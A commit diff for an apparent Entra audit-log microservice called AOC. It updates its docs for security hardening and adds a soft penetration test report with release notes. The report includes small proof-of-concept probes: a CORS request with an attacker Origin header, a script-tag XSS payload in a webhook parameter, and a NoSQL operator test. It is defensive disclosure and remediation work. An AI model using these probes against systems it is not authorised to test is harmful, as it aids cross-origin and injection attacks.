docs: update AGENTS.md, README.md, DEPLOY.md, ROADMAP.md for v1.7.14 security features

v1.7.14: LLM/SIEM domain allowlists, SRI hashes, auth misconfig warning, Azure Key Vault integration
v1.7.13: switch Alpine.js to CSP build, remove unsafe-eval from CSP
2026-04-27 16:52:35 +02:00 · 2026-04-27 16:45:06 +02:00 · 2026-04-27 16:08:34 +02:00 · 2026-04-27 14:19:28 +02:00 · 2026-04-27 10:39:33 +02:00 · 2026-04-27 10:32:35 +02:00
23 changed files with 1148 additions and 58 deletions
--- a/.env.example
+++ b/.env.example
@@ -27,6 +27,18 @@ RETENTION_DAYS=0
 # Optional: comma-separated CORS origins (e.g., http://localhost:3000,https://app.example.com)
 CORS_ORIGINS=*

+# OpenAPI docs exposure (set true only for dev)
+DOCS_ENABLED=false
+
+# LLM endpoint domain restriction (comma-separated, supports wildcards like *.openai.azure.com)
+# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
+
+# SIEM webhook domain restriction (comma-separated)
+# SIEM_ALLOWED_DOMAINS=your-siem.com
+
+# Optional Azure Key Vault for secrets storage
+# AZURE_KEY_VAULT_NAME=your-keyvault-name
+
 # Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook)
 SIEM_ENABLED=false
 SIEM_WEBHOOK_URL=
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -9,20 +9,24 @@ AOC is a FastAPI microservice that ingests Microsoft Entra (Azure AD) audit logs
 - **Runtime**: Python 3.11 (3.14 for tests)
 - **Web Framework**: FastAPI + Uvicorn (Gunicorn in production)
 - **Database**: MongoDB (PyMongo)
+- **Cache/Queue**: Valkey/Redis 8 (caching + arq async job queue)
 - **Frontend**: Alpine.js + HTML/CSS (served as static files from `backend/frontend/`)
 - **Authentication**: Optional OIDC Bearer token validation against Microsoft Entra (using `python-jose` and MSAL.js on the frontend)
 - **External APIs**: Microsoft Graph API, Office 365 Management Activity API, Azure OpenAI / MS Foundry
 - **Deployment**: Docker Compose (dev), Docker Compose + nginx (prod)
 - **CI/CD**: Gitea Actions (lint + test + Docker build + release)
+- **Secrets Storage**: Environment variables (`.env`) or optional Azure Key Vault

 ## Project Structure

 ```
 backend/
  main.py              # FastAPI app, router registration, background periodic fetch
-  config.py            # Pydantic Settings configuration (loads .env)
+  config.py            # Pydantic Settings configuration (loads .env + optional Key Vault)
  database.py          # MongoClient setup (db = micro_soc, collection = events)
  auth.py              # OIDC Bearer token validation, JWKS caching, role/group checks
+  secrets_manager.py   # Optional Azure Key Vault integration for secrets
+  rate_limiter.py      # Redis-backed fixed-window rate limiter (fail-closed)
  requirements.txt     # Python dependencies
  Dockerfile           # python:3.11-slim image, non-root user, version baked at build
  mcp_server.py        # Standalone MCP server for Claude Desktop / Cursor integration
@@ -34,6 +38,9 @@ backend/
    health.py          # GET /health, GET /metrics
    rules.py           # Rule-based alerting endpoints
    webhooks.py        # Microsoft Graph change notification webhooks
+    alerts.py          # Alert management endpoints
+    saved_searches.py  # Saved filter presets
+    jobs.py            # Async job status polling
  graph/
    auth.py            # Client credentials token acquisition for Graph
    audit_logs.py      # Fetch and enrich directory audit logs from Graph
@@ -59,16 +66,42 @@ Copy `.env.example` to `.env` at the repo root and fill in values:
 cp .env.example .env
 ```

-Key variables:
+### Core variables
 - `TENANT_ID`, `CLIENT_ID`, `CLIENT_SECRET` — Microsoft app registration credentials (application permissions)
 - `AUTH_ENABLED` — set `true` to protect API/UI with OIDC Bearer tokens
 - `AUTH_TENANT_ID`, `AUTH_CLIENT_ID` — token validation audience/issuer
 - `AUTH_ALLOWED_ROLES`, `AUTH_ALLOWED_GROUPS` — comma-separated access control lists
 - `ENABLE_PERIODIC_FETCH`, `FETCH_INTERVAL_MINUTES` — background ingestion scheduler
 - `MONGO_ROOT_USERNAME`, `MONGO_ROOT_PASSWORD`, `MONGO_PORT` — used by Docker Compose for MongoDB
+
+### AI / LLM variables
 - `AI_FEATURES_ENABLED` — set `false` to completely disable AI endpoints and UI (default `true`)
 - `LLM_API_KEY`, `LLM_BASE_URL`, `LLM_MODEL`, `LLM_MAX_EVENTS`, `LLM_TIMEOUT_SECONDS` — LLM provider settings
 - `LLM_API_VERSION` — required for Azure OpenAI / MS Foundry endpoints
+- `LLM_ALLOWED_DOMAINS` — comma-separated domain allowlist for LLM endpoints (e.g. `api.openai.com,*.openai.azure.com`)
+
+### Security variables
+- `CORS_ORIGINS` — comma-separated allowed origins (default `*`; set explicit origins in production)
+- `DOCS_ENABLED` — set `true` to expose `/docs`, `/redoc`, `/openapi.json` (default `false`)
+- `METRICS_ALLOWED_IPS` — comma-separated CIDRs allowed to access `/metrics` (default: private networks + loopback)
+- `WEBHOOK_CLIENT_SECRET` — secret for validating Graph webhook `clientState`
+- `SIEM_ENABLED`, `SIEM_WEBHOOK_URL` — optional SIEM forwarding
+- `SIEM_ALLOWED_DOMAINS` — comma-separated domain allowlist for SIEM webhook URLs
+- `RATE_LIMIT_ENABLED`, `RATE_LIMIT_REQUESTS`, `RATE_LIMIT_WINDOW_SECONDS` — Redis-backed rate limiting
+
+### Optional Azure Key Vault
+- `AZURE_KEY_VAULT_NAME` — name of the Azure Key Vault to load secrets from
+- When set, AOC fetches these secrets at startup:
+  - `aoc-client-secret` → `CLIENT_SECRET`
+  - `aoc-llm-api-key` → `LLM_API_KEY`
+  - `aoc-mongo-uri` → `MONGO_URI`
+  - `aoc-webhook-client-secret` → `WEBHOOK_CLIENT_SECRET`
+- Requires `azure-identity` and `azure-keyvault-secrets` (uncomment in `requirements.txt`)
+
+### Privacy / access control
+- `PRIVACY_SERVICES` — comma-separated services to hide from non-privileged users (e.g. `Exchange,Teams`)
+- `PRIVACY_SENSITIVE_OPERATIONS` — comma-separated operations to gate
+- `PRIVACY_SERVICE_ROLES` — comma-separated Entra roles that grant access to privacy data

 ## Build and Run Commands

@@ -102,7 +135,9 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000
 - `GET /api/config/features` — feature flags (`ai_features_enabled`)
 - `POST /api/ask` — natural language query; returns LLM narrative + referenced events (only when `AI_FEATURES_ENABLED=true`)
 - `GET /health` — liveness probe with DB connectivity
- `GET /metrics` — Prometheus metrics
+- `GET /metrics` — Prometheus metrics (IP-restricted by default)
+- `GET /api/source-health` — last fetch status per ingestion source
+- `GET /api/version` — running version

 ## MCP Server

@@ -162,16 +197,30 @@ When adding new features or bug fixes, add or update tests in `backend/tests/`.
 - Auth middleware and token validation
 - API endpoints (`/api/events`, `/api/fetch-audit-logs`, `/api/ask`)
 - NLQ time range extraction, entity extraction, query building
+- Rate limiting behavior

 ## Security Considerations

- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env`. Never commit `.env`.
- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer claims. Tokens are decoded without strict signature verification (`jwt.get_unverified_claims`), so the tenant and issuer checks are the primary gate.
- **Role/Group gating**: Access is allowed if the token’s `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed.
+- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env` or Azure Key Vault. Never commit `.env`.
+- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer/audience claims. Tokens are decoded with RS256 signature verification.
+- **Role/Group gating**: Access is allowed if the token's `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed — a startup warning is logged in this case.
+- **CORS**: When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, `allow_credentials` is forced to `false` to prevent cross-origin token leakage.
+- **Rate limiting**: Redis-backed fixed-window rate limiting with per-category limits (fetch=10/hr, ask=30/min, write=20/min, default=120/min). Fails closed (returns 429) when Redis is unavailable.
 - **Pagination limits**: `page_size` is clamped to a maximum of 500 to prevent large queries.
 - **Fetch window cap**: `hours` is clamped to 720 (30 days) to avoid runaway API calls.
+- **LLM SSRF guard**: `LLM_BASE_URL` must be HTTPS and cannot point to private IPs. Optional `LLM_ALLOWED_DOMAINS` restricts to specific domains.
+- **SIEM SSRF guard**: `SIEM_WEBHOOK_URL` has the same validation as LLM URLs, plus optional `SIEM_ALLOWED_DOMAINS`.
+- **Metrics IP gating**: `/metrics` is restricted to private/loopback IPs by default via `METRICS_ALLOWED_IPS`.
+- **OpenAPI docs**: Disabled by default (`DOCS_ENABLED=false`). Enable only in development.
+- **CSP**: Content-Security-Policy headers are set on all responses. `unsafe-eval` is required for Alpine.js v3 expression evaluation.
+- **SRI**: CDN scripts (Alpine.js, MSAL.js) include Subresource Integrity hashes to prevent supply chain compromise.
 - **MCP server**: The MCP server bypasses auth entirely. Only run it in trusted environments or behind a VPN.

+### Security Documentation
+
+- `PEN_TEST_REPORT_v1.7.11.md` — Internal soft penetration test findings and remediation
+- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra/token abuse vectors
+
 ## Maintenance and Operations

 The `backend/maintenance.py` script provides two CLI commands useful for backfilling or correcting stored data:
--- a/DEPLOY.md
+++ b/DEPLOY.md
@@ -7,6 +7,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 - **nginx** — reverse proxy, TLS termination, static file serving
 - **backend** — FastAPI application (Gunicorn + Uvicorn workers)
 - **mongo** — MongoDB data store (not exposed externally)
+- **valkey** — Redis-compatible cache and async job queue (not exposed externally)

 ## Prerequisites

@@ -20,7 +21,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 1. **Clone / pull the latest release**

   ```bash
-   git checkout v1.1.0
+   git checkout v1.7.14
   ```

 2. **Copy and edit environment variables**
@@ -33,7 +34,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 3. **Set the release version**

   ```bash
-   export AOC_VERSION=v1.1.0
+   export AOC_VERSION=v1.7.14
   ```

 4. **Deploy**
@@ -53,7 +54,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 ## Updating to a new release

 ```bash
-export AOC_VERSION=v1.2.0
+export AOC_VERSION=v1.7.14
 docker compose -f docker-compose.prod.yml pull
 docker compose -f docker-compose.prod.yml up -d
 ```
@@ -75,24 +76,56 @@ docker compose -f docker-compose.prod.yml up -d

 Replace the `nginx` service in `docker-compose.prod.yml` with a Certbot-friendly setup (e.g., use the `nginx-proxy` + `acme-companion` stack) or mount the Certbot certificates into `nginx/ssl/`.

-## Security hardening
+## Security Hardening

 - MongoDB is **not exposed** to the host — only the backend container can reach it.
+- Valkey/Redis is **not exposed** to the host — only the backend container can reach it.
 - The backend runs as a non-root (`aoc`) user inside the container.
 - nginx adds security headers (`X-Frame-Options`, `X-Content-Type-Options`, etc.).
 - Keep `.env` out of version control — it is listed in `.gitignore`.
+- Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access to admin/security roles.
+- Set explicit `CORS_ORIGINS` — do not use `*` in production when auth is enabled.
+- Set `DOCS_ENABLED=false` to hide OpenAPI docs (`/docs`, `/openapi.json`).
+- Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications.
+- Set `LLM_ALLOWED_DOMAINS` if using AI features (e.g. `api.openai.com,*.openai.azure.com`).
+- Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding.
+- Review `METRICS_ALLOWED_IPS` — defaults to private networks + loopback.
+
+## Azure Key Vault (Optional)
+
+To eliminate long-lived secrets from `.env`:
+
+1. Create an Azure Key Vault and add these secrets:
+   - `aoc-client-secret` — your Graph app `CLIENT_SECRET`
+   - `aoc-llm-api-key` — your `LLM_API_KEY` (if using AI)
+   - `aoc-mongo-uri` — your `MONGO_URI`
+   - `aoc-webhook-client-secret` — your `WEBHOOK_CLIENT_SECRET`
+
+2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
+
+3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
+
+4. Grant the container identity `Get` permission on secrets:
+   - If using Azure Container Instances / AKS: assign a managed identity
+   - If using VM: assign a managed identity or use a service principal
+   - If using local Docker: authenticate via `az login` on the host
+
+5. Rebuild and redeploy:
+   ```bash
+   docker compose -f docker-compose.prod.yml up -d --build
+   ```

 ## Rollback

 ```bash
-export AOC_VERSION=v1.0.3
+export AOC_VERSION=v1.7.13
 docker compose -f docker-compose.prod.yml pull
 docker compose -f docker-compose.prod.yml up -d
 ```

 ## Monitoring

- Prometheus metrics: `http://your-host/metrics`
+- Prometheus metrics: `http://your-host/metrics` (IP-restricted by default)
 - Health check: `http://your-host/health`
 - Container logs:

@@ -100,4 +133,13 @@ docker compose -f docker-compose.prod.yml up -d
  docker compose -f docker-compose.prod.yml logs -f backend
  docker compose -f docker-compose.prod.yml logs -f nginx
  docker compose -f docker-compose.prod.yml logs -f mongo
+  docker compose -f docker-compose.prod.yml logs -f valkey
  ```
+
+## Troubleshooting
+
+- **Auth warning in logs**: "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured" — set these to restrict access.
+- **CORS issues**: Set `CORS_ORIGINS` to your exact frontend origin(s). Wildcard with auth enabled disables credentials.
+- **Rate limiting 429s**: Check Redis/Valkey connectivity. The rate limiter fails closed (returns 429) when Redis is down.
+- **LLM errors**: Verify `LLM_BASE_URL` is in `LLM_ALLOWED_DOMAINS` if the allowlist is configured.
+- **SIEM not forwarding**: Verify `SIEM_WEBHOOK_URL` uses HTTPS and is in `SIEM_ALLOWED_DOMAINS`.
--- a/PEN_TEST_REPORT_v1.7.11.md
+++ b/PEN_TEST_REPORT_v1.7.11.md
@@ -0,0 +1,203 @@
+# AOC v1.7.11 Soft Penetration Test Report
+
+**Date:** 2026-04-27
+**Target:** Local AOC instance (port 8001), auth disabled, AI disabled
+**Tester:** Automated + manual curl-based probing
+**Scope:** FastAPI backend, REST API endpoints, middleware, headers
+
+---
+
+## Executive Summary
+
+AOC v1.7.11 has one **CRITICAL** vulnerability (CORS credentials leak) and several defense-in-depth gaps. The good news: input validation, NoSQL injection resistance, and error handling are solid. The bad news: CORS is dangerously permissive, security headers are missing, and the rate limiter fails open on Redis failure.
+
+| Severity | Count | Categories |
+|----------|-------|------------|
+| CRITICAL | 1 | CORS with credentials |
+| HIGH | 1 | Missing security headers |
+| MEDIUM | 2 | Fail-open rate limiter, OpenAPI exposure |
+| LOW | 2 | Information disclosure, webhook content injection |
+| INFO | 3 | Positive findings (no stack traces, input validation, NoSQL resistance) |
+
+---
+
+## CRITICAL
+
+### 1. CORS Reflects Any Origin with `allow_credentials=true`
+
+**Finding:** The CORS middleware returns `Access-Control-Allow-Origin: <any origin>` AND `Access-Control-Allow-Credentials: true` for every origin that sends an `Origin` header.
+
+**Evidence:**
+```bash
+curl -H "Origin: https://evil-attacker.com" http://localhost:8001/api/config/auth
+# Response headers:
+# access-control-allow-origin: https://evil-attacker.com
+# access-control-allow-credentials: true
+```
+
+**Impact:** An attacker can host a malicious page on any domain and make authenticated cross-origin requests to the AOC API using the victim's browser cookies/tokens. This effectively bypasses Same-Origin Policy for authenticated actions.
+
+**Root Cause:** `main.py` configures CORS with `allow_origins=["*"]` (from `CORS_ORIGINS` env var, default `"*"`) AND `allow_credentials=True`. According to CORS spec, a wildcard origin with credentials is technically invalid, but Starlette/FastAPI appears to reflect the request origin instead.
+
+**Recommendation:**
+- When `AUTH_ENABLED=true`, reject requests from origins not in an explicit allowlist.
+- Set `allow_credentials=False` if wildcard origins are needed.
+- Or, require `CORS_ORIGINS` to be explicitly configured (no default wildcard) when auth is enabled.
+
+---
+
+## HIGH
+
+### 2. Missing Security Headers
+
+**Finding:** The following security headers are absent from all responses:
+
+| Header | Purpose | Status |
+|--------|---------|--------|
+| `X-Content-Type-Options: nosniff` | Prevents MIME sniffing | MISSING |
+| `X-Frame-Options: DENY` or `SAMEORIGIN` | Clickjacking protection | MISSING |
+| `Strict-Transport-Security` | HSTS enforcement | MISSING |
+| `Referrer-Policy: strict-origin-when-cross-origin` | Limits referrer leakage | MISSING |
+| `Permissions-Policy` | Restricts browser features | MISSING |
+
+**Impact:** Increased attack surface for clickjacking, MIME confusion attacks, and information leakage via referrer headers.
+
+**Recommendation:** Add a security headers middleware to set these on all responses. HSTS only when served over HTTPS.
+
+---
+
+## MEDIUM
+
+### 3. Rate Limiter Fails Open on Redis Failure
+
+**Finding:** In `rate_limiter.py` line 81-82:
+```python
+except Exception as exc:
+    logger.warning("Rate limiter Redis error; allowing request", error=str(exc))
+```
+
+If Redis becomes unreachable, all rate limits are silently bypassed.
+
+**Evidence:** When Redis was down, 150+ requests to `/api/events` all returned 200 with no 429s.
+
+**Impact:** A DoS on Redis (or a network partition) removes all rate limiting, allowing unlimited API abuse.
+
+**Recommendation:** Make the rate limiter fail-closed: return 429 or 503 when Redis is unavailable, or use an in-memory fallback with a conservative limit.
+
+### 4. OpenAPI Schema Publicly Exposed
+
+**Finding:** `/docs`, `/redoc`, and `/openapi.json` are accessible without authentication and return the full API schema.
+
+**Evidence:**
+```bash
+curl -s http://localhost:8001/openapi.json | jq '.paths | keys'
+# Returns all 15+ API paths including internal endpoints
+```
+
+**Impact:** Attackers get a complete map of the API, including request/response schemas, parameter types, and endpoint structure. This significantly reduces reconnaissance time.
+
+**Recommendation:** Disable OpenAPI docs in production (`docs_url=None, redoc_url=None, openapi_url=None`) or gate them behind admin authentication.
+
+---
+
+## LOW
+
+### 5. Information Disclosure via `/api/config/auth` and `/metrics`
+
+**Finding:**
+- `/api/config/auth` leaks `tenant_id` and `client_id` even when auth is disabled. These values fall back to the Graph API credentials (`TENANT_ID`/`CLIENT_ID`), which may be sensitive.
+- `/metrics` exposes Python version (`3.14.3`), GC statistics, and application-internal metric names.
+
+**Evidence:**
+```json
+{
+  "auth_enabled": false,
+  "tenant_id": "0ec9f34c-17c8-4541-b084-7d64ecdcc997",
+  "client_id": "cc31fd45-1eca-431f-a2c6-ba81cd4c5d50"
+}
+```
+
+**Impact:** Low direct impact (tenant/client IDs are not secrets), but aids reconnaissance and narrows the attack surface.
+
+**Recommendation:**
+- Return empty strings for `tenant_id`/`client_id` when `auth_enabled=false`.
+- Gate `/metrics` behind IP allowlist or admin auth (standard Prometheus practice).
+
+### 6. Webhook Validation Token Echoed Without Sanitization
+
+**Finding:** The `/api/webhooks/graph` endpoint echoes `validationToken` query parameter as `text/plain` without any sanitization or length limits.
+
+**Evidence:**
+```bash
+curl -X POST "http://localhost:8001/api/webhooks/graph?validationToken=<script>alert(1)</script>"
+# Returns: <script>alert(1)</script> with Content-Type: text/plain
+```
+
+**Impact:** Low in the intended Microsoft Graph flow (token is Microsoft-generated), but if the endpoint is hit directly, an attacker could use this for cache poisoning, response splitting, or social engineering by making the endpoint return attacker-controlled content.
+
+**Recommendation:** Validate the validationToken format (e.g., JWT-like structure, length limits) before echoing, or set `Content-Type: text/plain; charset=utf-8` with `X-Content-Type-Options: nosniff` to reduce MIME confusion risk.
+
+---
+
+## INFO (Positive Findings)
+
+### A. No Stack Traces in Error Responses
+
+All errors (422, 404, 429, 500 if triggered) return generic JSON messages without internal details or stack traces. Good.
+
+### B. Pydantic Input Validation is Effective
+
+- `page_size` capped at 500 (returns 422 for 501, 0, -1)
+- `hours` capped at 720 (returns 422 for 721)
+- Invalid cursors return 400 with "Invalid cursor"
+- Malformed JSON bodies return 422 with field-level validation errors
+- `AlertCondition` op field strictly validated against `Literal["eq", "neq", "contains", "in", "after_hours"]`
+
+### C. NoSQL Injection Resistant
+
+MongoDB operators passed as string filter values are treated as literals, not operators:
+
+```bash
+curl "http://localhost:8001/api/events?operation=\$ne"
+# Returns 0 results (treated as literal string "$ne")
+```
+
+The `_build_query()` function in `events.py` uses `re.escape()` for search input and constructs queries safely.
+
+### D. Bulk Tags Pre-Count Check Works
+
+`bulk_tags` endpoint capped at 10,000 matched documents via pre-count check. 93 events were successfully tagged with no bypass.
+
+### E. Rate Limiting Works When Redis is Healthy
+
+- `/api/fetch-audit-logs`: 429 after 11 requests (limit: 10/hr)
+- `/api/events`: 429 after ~120 requests (limit: 120/min)
+- Exempt paths work correctly: `/health`, `/metrics`, `/api/config/auth`, `/api/config/features`
+- `Retry-After` header is returned on 429 responses
+
+---
+
+## Recommendations Summary
+
+| Priority | Action | Effort |
+|----------|--------|--------|
+| P0 | Fix CORS: do not allow credentials with wildcard/reflected origins | Small |
+| P1 | Add security headers middleware (X-Content-Type-Options, X-Frame-Options, HSTS, Referrer-Policy) | Small |
+| P2 | Make rate limiter fail-closed on Redis errors | Small |
+| P2 | Disable OpenAPI docs in production or gate behind auth | Small |
+| P3 | Sanitize or validate webhook validationToken before echo | Small |
+| P3 | Gate `/metrics` behind IP allowlist | Small |
+| P3 | Hide tenant_id/client_id from `/api/config/auth` when auth is disabled | Tiny |
+| P4 | Consider Alpine.js CSP build to remove `unsafe-eval` from script-src | Medium |
+
+---
+
+## Test Environment
+
+```
+Backend: uvicorn on localhost:8001 (auth=false, ai=false)
+MongoDB: docker container, port 27018
+Redis:   docker container, port 6380
+```
+
+*Test commands and raw outputs available in `/tmp/pen_test*.sh` scripts.*
--- a/README.md
+++ b/README.md
@@ -11,13 +11,14 @@ FastAPI microservice that ingests Microsoft Entra (Azure AD) and other admin aud
 - Optional OIDC bearer auth (Entra) to protect the API/UI and gate access by roles/groups.
 - Natural language query (`/api/ask`) powered by LLM (OpenAI, Azure OpenAI, or any compatible API).
 - MCP server for Claude Desktop / Cursor integration.
+- Optional Azure Key Vault integration for secrets storage.

 ## Prerequisites (macOS)
 - Python 3.11
 - Docker Desktop (for the quickest start) or a local MongoDB instance
 - An Entra app registration with **Application** permission `AuditLog.Read.All` and admin consent granted
  - Also required to fetch other sources:
-    - `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registration’s API permissions for Office 365 Management APIs)
+    - `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registration's API permissions for Office 365 Management APIs)
    - Intune audit: `DeviceManagementConfiguration.Read.All` (or broader) for `/deviceManagement/auditEvents`
  - Optional API protection: configure `AUTH_ENABLED=true` and set `AUTH_TENANT_ID`/`AUTH_CLIENT_ID` (the audience) plus allowed roles/groups.

@@ -49,8 +50,43 @@ cp .env.example .env
 # LLM_BASE_URL=https://api.openai.com/v1
 # LLM_MODEL=gpt-4o-mini
 # LLM_TIMEOUT_SECONDS=30
+# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
+
+# Optional: SIEM forwarding
+# SIEM_ENABLED=true
+# SIEM_WEBHOOK_URL=https://your-siem.com/webhook
+# SIEM_ALLOWED_DOMAINS=your-siem.com
+
+# Optional: Azure Key Vault for secrets storage
+# AZURE_KEY_VAULT_NAME=your-keyvault-name
 ```

+### Using Azure Key Vault for secrets
+Instead of storing `CLIENT_SECRET`, `LLM_API_KEY`, `MONGO_URI`, and `WEBHOOK_CLIENT_SECRET` in `.env`, you can store them in Azure Key Vault:
+
+1. Create a Key Vault and add secrets with these names:
+   - `aoc-client-secret` → your Graph app `CLIENT_SECRET`
+   - `aoc-llm-api-key` → your `LLM_API_KEY`
+   - `aoc-mongo-uri` → your `MONGO_URI`
+   - `aoc-webhook-client-secret` → your `WEBHOOK_CLIENT_SECRET`
+2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
+3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
+4. Ensure the container has Azure identity credentials (managed identity, service principal, or Azure CLI auth)
+
+## Security Hardening Checklist
+
+Before deploying to production:
+
+- [ ] Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access
+- [ ] Set explicit `CORS_ORIGINS` (do not use `*` in production with auth enabled)
+- [ ] Set `DOCS_ENABLED=false` (default) to hide OpenAPI docs
+- [ ] Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications
+- [ ] Set `LLM_ALLOWED_DOMAINS` if using AI features to prevent data exfiltration
+- [ ] Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding
+- [ ] Review `METRICS_ALLOWED_IPS` — defaults to private networks only
+- [ ] Consider Azure Key Vault instead of `.env` for secrets
+- [ ] Review the threat model: `THREAT_MODEL_v1.7.13.md`
+
 ## Run with Docker Compose (recommended)
 ```bash
 docker compose up --build
@@ -76,7 +112,7 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000

 ## API
 - `GET /health` — health check with MongoDB connectivity status.
- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors.
+- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors (IP-restricted).
 - `GET /api/version` — running version (baked into the Docker image at build time).
 - `GET /api/fetch-audit-logs` — pulls the last 7 days by default (override with `?hours=N`, capped to 30 days) of:
  - Entra directory audit logs (`/auditLogs/directoryAudits`)
@@ -171,7 +207,7 @@ curl http://localhost:8000/api/fetch-audit-logs
 - Visit the UI at http://localhost:8000 to filter by user/service/action/result/time, search raw text, paginate, and view raw events.

 ## Maintenance (Dockerized)
-Use the backend image so you don’t need a local venv:
+Use the backend image so you don't need a local venv:
 ```bash
 # ensure Mongo + backend network are up
 docker compose up -d mongo
@@ -182,10 +218,15 @@ docker compose run --rm backend python maintenance.py dedupe
 ```
 Omit `--limit` to process all events. You can also run commands inside a running backend container with `docker compose exec backend ...`.

+## Security Documentation
+- `PEN_TEST_REPORT_v1.7.11.md` — Penetration test findings and remediation
+- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra application abuse, token handling, data exfiltration vectors
+
 ## Notes / Troubleshooting
 - Ensure `TENANT_ID`, `CLIENT_ID`, and `CLIENT_SECRET` match an app registration with `AuditLog.Read.All` (application) permission and admin consent.
 - Additional permissions: Office 365 Management Activity (`ActivityFeed.Read`), and Intune audit (`DeviceManagementConfiguration.Read.All`).
- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set).
+- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set). A startup warning is logged if auth is enabled but no roles/groups are configured.
 - Backfill limits: Management Activity API typically exposes ~7 days of history via API (longer if your tenant has extended/Advanced Audit retention). Directory/Intune audit retention follows your tenant policy (commonly 30–90 days, longer with Advanced Audit).
 - If you change Mongo credentials/ports, update `MONGO_URI` in `.env` (Docker Compose passes it through to the backend).
 - The service uses the `micro_soc` database and `events` collection by default; adjust in `backend/config.py` if needed.
+- If using Azure Key Vault, ensure the runtime identity (managed identity, service principal, or local Azure CLI) has `Get` permission on secrets.
--- a/RELEASE_NOTES_v1.7.12.md
+++ b/RELEASE_NOTES_v1.7.12.md
@@ -0,0 +1,43 @@
+# AOC v1.7.12 Release Notes
+
+**Release Date:** 2026-04-27
+
+## Security Hardening (Penetration Test Remediation)
+
+This release addresses all findings from the internal soft penetration test of v1.7.11.
+
+### Critical Fix: CORS Credentials Leak
+- **Issue:** When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, the CORS middleware reflected any origin with `Access-Control-Allow-Credentials: true`, allowing cross-origin authenticated requests from attacker-controlled domains.
+- **Fix:** When auth is enabled with a wildcard origin, `allow_credentials` is now forced to `False`. CORS still works for unauthenticated requests, but bearer tokens cannot be leaked cross-origin.
+
+### High Fix: Missing Security Headers
+- Added `X-Content-Type-Options: nosniff`
+- Added `X-Frame-Options: DENY`
+- Added `Referrer-Policy: strict-origin-when-cross-origin`
+- Added `Permissions-Policy` restricting browser features (accelerometer, camera, geolocation, gyroscope, magnetometer, microphone, payment, USB)
+
+### Medium Fixes
+- **Rate limiter fail-closed:** Previously, a Redis outage silently disabled all rate limiting. The rate limiter now returns `429` when Redis is unreachable.
+- **OpenAPI docs exposure:** `/docs`, `/redoc`, and `/openapi.json` are disabled by default. Set `DOCS_ENABLED=true` to re-enable (intended for development only).
+
+### Low Fixes
+- **Information disclosure:** `/api/config/auth` no longer leaks `tenant_id` and `client_id` when `auth_enabled=false`.
+- **Webhook validation token:** Added length cap (1024 chars) and ASCII-only validation before echoing `validationToken`. Response now includes `X-Content-Type-Options: nosniff`.
+
+## Files Changed
+
+| File | Change |
+|------|--------|
+| `backend/main.py` | CORS fix, security headers middleware, conditional OpenAPI docs |
+| `backend/config.py` | Added `DOCS_ENABLED` setting |
+| `backend/rate_limiter.py` | Fail-closed on Redis errors |
+| `backend/routes/config.py` | Hide tenant/client IDs when auth disabled |
+| `backend/routes/webhooks.py` | Validate validationToken before echo |
+| `backend/tests/conftest.py` | Enhanced FakeRedis mock with `incr`/`expire` |
+| `.env.example` | Documented `DOCS_ENABLED` |
+| `VERSION` | Bumped to 1.7.12 |
+
+## Test Results
+
+- **80/80 pytest tests passing**
+- Penetration test report: `PEN_TEST_REPORT_v1.7.11.md`
--- a/RELEASE_NOTES_v1.7.13.md
+++ b/RELEASE_NOTES_v1.7.13.md
@@ -0,0 +1,34 @@
+# AOC v1.7.13 Release Notes
+
+**Release Date:** 2026-04-27
+
+## Security Hardening: Alpine.js CSP Build
+
